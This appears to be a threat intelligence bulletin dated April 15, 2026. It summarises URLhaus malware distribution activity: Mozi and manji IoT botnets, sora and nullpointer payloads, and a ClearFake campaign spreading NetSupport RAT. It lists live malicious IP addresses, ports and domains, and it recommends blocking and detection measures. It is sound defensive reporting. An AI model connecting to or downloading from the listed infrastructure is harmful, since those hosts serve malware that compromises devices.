On April 15, 2026, malicious infrastructure activity remained elevated with 50 malware distribution URLs identified across URLhaus feeds. The threat landscape is dominated by IoT-focused botnet campaigns, particularly Mozi botnet variants and the emerging 'manji' malware family targeting Linux-based embedded devices. Multiple IP addresses are actively serving multi-architecture payloads designed for cross-platform IoT exploitation. Additionally, ClearFake/NetSupport campaign infrastructure continues operating through compromised domains, leveraging social engineering to distribute remote access tools. The concentration of wget-based delivery mechanisms indicates automated exploitation of known IoT vulnerabilities remains a primary attack vector.
The manji malware family demonstrates sophisticated cross-architecture capabilities with payloads compiled for x86, ARM, MIPS, SPARC, and PowerPC architectures, indicating threat actors are casting wide nets across diverse IoT ecosystems. Infrastructure at 188.214.30.136 operates multiple HTTP services on ports 3775-3779, suggesting organized malware-as-a-service operations. The continued Mozi botnet activity, despite previous law enforcement actions, demonstrates persistent IoT threats requiring enhanced network segmentation and firmware update strategies.
Security teams should prioritize blocking identified malicious infrastructure, implementing network-level detection for wget-based download patterns, and reviewing IoT device exposure. The diversity of targeted architectures underscores the importance of comprehensive asset inventory and patch management across all connected devices, particularly those in industrial and enterprise environments.
Active malware distribution targeting diverse IoT device architectures through wget-based delivery mechanisms
Infrastructure at 188.214.30.136 distributing manji malware across ports 3775-3779, targeting x86, ARM, MIPS, SPARC, and PowerPC architectures. Multiple payloads indicate broad IoT device targeting including routers, cameras, and embedded systems.
Active Mozi botnet distribution observed from multiple Chinese IP addresses (223.123.43.x range and 182.119.62.86). Mozi continues targeting IoT devices despite previous disruption efforts, using multiple high-numbered ports for C2 communication.
Domain maro033.identifypls.us.com actively serving manji malware variants across multiple architectures. The use of a seemingly legitimate-looking domain suggests attempt to evade basic reputation-based blocking.
Active ClearFake campaign distributing NetSupport RAT through compromised or malicious domain gate6-way.bri7tanon.in.net. Uses browser update social engineering lure to trick users into downloading remote access tools.
Infrastructure at 176.65.148.189 distributing 'sora' malware variants targeting ARM, SPARC, and MIPS64 architectures through HideChaotic directory path. Indicates organized malware distribution with version control.
Multiple IP addresses (157.245.158.45, 152.42.183.1, 91.218.66.241, 103.186.147.155) serving generic payload scripts and architecture-specific binaries including 'nullpointer' malware family. Distributed infrastructure suggests botnet recruitment operations.
Threat actors leveraging automated exploitation and cross-architecture compilation for maximum IoT device compromise
All 50 malware distribution URLs utilize wget as the primary delivery mechanism, indicating exploitation of IoT devices with command injection or credential compromise vulnerabilities. Attack chains likely automated through scanners identifying vulnerable devices.
Threat actors compiling malware for 10+ architectures (x86, x86_64, ARM v4/5/6/7, MIPS, SPARC, PowerPC, ARC, SH4) ensures compatibility across maximum number of IoT devices. Indicates sophisticated build infrastructure and targeting of diverse device ecosystems.
Industry analysis on IOC enrichment alternatives for security operations
Analysis of cost-effective alternatives to VirusTotal API for multi-source indicator of compromise enrichment. Relevant for teams building threat intelligence pipelines and managing API cost constraints.